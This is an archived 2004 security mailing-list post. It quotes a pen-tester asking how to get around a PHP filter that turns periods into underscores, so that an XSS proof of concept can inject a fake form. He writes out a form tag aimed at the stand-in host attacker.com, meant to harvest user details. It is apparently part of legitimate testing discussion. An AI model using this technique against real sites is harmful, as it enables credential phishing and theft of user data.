mailing list archives
Re: Fullstop Substitution in XSS
From: Liam Quinn <liam () htmlhelp com>
Date: Mon, 31 May 2004 22:04:34 -0400 (EDT)
On Sat, 29 May 2004, Calum Power wrote:
As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.
My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">